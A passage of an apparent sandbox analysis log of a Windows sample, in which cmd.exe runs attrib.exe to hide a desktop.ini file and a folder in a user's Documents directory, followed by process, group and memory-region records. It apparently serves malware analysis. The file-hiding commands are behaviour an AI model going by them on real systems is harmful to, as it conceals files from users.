lpAttributeList=0x12f3f4, lpSize=0x12f4bc) returned 1 [0131.124] UpdateProcThreadAttribute (in: lpAttributeList=0x12f3f4, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f4b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f3f4, lpPreviousValue=0x0) returned 1 [0131.124] GetStartupInfoW (in: lpStartupInfo=0x12f3b0 | out: lpStartupInfo=0x12f3b0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0131.124] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0131.124] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f450*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f49c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" ", lpProcessInformation=0x12f49c*(hProcess=0x4c, hThread=0x50, dwProcessId=0x9c0, dwThreadId=0x9e0)) returned 1 [0131.126] CloseHandle (hObject=0x50) returned 1 [0131.126] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0131.126] GetEnvironmentStringsW () returned 0x202d20* [0131.126] FreeEnvironmentStringsW (penv=0x202d20) returned 1 [0131.126] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0131.161] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x12f390 | out: lpExitCode=0x12f390*=0x0) returned 1 [0131.161] CloseHandle (hObject=0x4c) returned 1 [0131.161] _vsnwprintf (in: _Buffer=0x12f4d8, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f39c | out: _Buffer="00000000") returned 8 [0131.161] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0131.162] GetEnvironmentStringsW () returned 0x202d20* [0131.162] FreeEnvironmentStringsW (penv=0x202d20) returned 1 [0131.162] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0131.162] GetEnvironmentStringsW () returned 0x202d20* [0131.162] FreeEnvironmentStringsW (penv=0x202d20) returned 1 [0131.162] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f3f4 | out: lpAttributeList=0x12f3f4) [0131.162] GetConsoleTitleW (in: lpConsoleTitle=0x12f7d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.162] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0131.162] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0131.162] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0131.162] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0xffffffff [0131.162] GetLastError () returned 0x2 [0131.162] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0xffffffff [0131.163] GetLastError () returned 0x2 [0131.163] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0x200820 [0131.163] FindClose (in: hFindFile=0x200820 | out: hFindFile=0x200820) returned 1 [0131.163] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0xffffffff [0131.163] GetLastError () returned 0x2 [0131.163] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12f074) returned 0x200820 [0131.163] FindClose (in: hFindFile=0x200820 | out: hFindFile=0x200820) returned 1 [0131.163] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0131.163] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0131.163] GetConsoleTitleW (in: lpConsoleTitle=0x12f56c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.163] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f3f4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f4bc | out: lpAttributeList=0x12f3f4, lpSize=0x12f4bc) returned 1 [0131.163] UpdateProcThreadAttribute (in: lpAttributeList=0x12f3f4, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f4b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f3f4, lpPreviousValue=0x0) returned 1 [0131.163] GetStartupInfoW (in: lpStartupInfo=0x12f3b0 | out: lpStartupInfo=0x12f3b0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0131.163] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0131.163] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f450*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f49c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\"", lpProcessInformation=0x12f49c*(hProcess=0x50, hThread=0x4c, dwProcessId=0x9f4, dwThreadId=0x9b8)) returned 1 [0131.165] CloseHandle (hObject=0x4c) returned 1 [0131.165] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0131.165] GetEnvironmentStringsW () returned 0x203760* [0131.165] FreeEnvironmentStringsW (penv=0x203760) returned 1 [0131.165] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0131.210] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12f390 | out: lpExitCode=0x12f390*=0x0) returned 1 [0131.210] CloseHandle (hObject=0x50) returned 1 [0131.210] _vsnwprintf (in: _Buffer=0x12f4d8, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f39c | out: _Buffer="00000000") returned 8 [0131.210] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0131.210] GetEnvironmentStringsW () returned 0x203760* [0131.210] FreeEnvironmentStringsW (penv=0x203760) returned 1 [0131.210] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0131.210] GetEnvironmentStringsW () returned 0x203760* [0131.211] FreeEnvironmentStringsW (penv=0x203760) returned 1 [0131.211] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f3f4 | out: lpAttributeList=0x12f3f4) [0131.211] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.211] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0131.211] _get_osfhandle (_FileHandle=1) returned 0x7 [0131.211] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0131.211] _get_osfhandle (_FileHandle=0) returned 0x3 [0131.211] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0131.211] SetConsoleInputExeNameW () returned 0x1 [0131.211] GetConsoleOutputCP () returned 0x1b5 [0131.211] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0131.211] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.212] exit (_Code=0) Process: id = "102" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16880" os_pid = "0x9d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "101" os_parent_pid = "0x848" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11740 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11741 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11742 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11743 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 11744 start_va = 0xb40000 end_va = 0xb46fff entry_point = 0xb40000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 11745 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11746 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11747 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11748 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 11749 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11750 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11751 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11752 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11753 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 11754 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 11755 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 11756 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11757 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11758 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11759 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11760 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11761 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11762 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11763 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11764 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11765 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11766 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11767 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 11768 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11769 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 159 os_tid = 0x9cc Process: id = "103" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16880" os_pid = "0x9c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "101" os_parent_pid = "0x848" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11841 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11842 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11843 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11844 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 11845 start_va = 0x2f0000 end_va = 0x2f6fff entry_point = 0x2f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 11846 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11847 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11848 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11849 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 11850 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11851 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11852 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11853 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11854 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 11855 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 11856 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 11857 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11858 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11859 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11860 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11861 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11862 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11863 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11864 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11865 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11866 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11867 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11868 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 11869 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11870 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 160 os_tid = 0x9e0 Process: id = "104" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16880" os_pid = "0x9f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "101" os_parent_pid = "0x848" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11871 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11872 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11873 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11874 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 11875 start_va = 0x930000 end_va = 0x936fff entry_point = 0x930000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 11876 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11877 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11878 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11879 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 11880 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11881 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11882 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11883 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11884 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 11885 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 11886 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 11887 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11888 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11889 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11890 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11891 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11892 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11893 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11894 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11895 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11896 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11897 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = 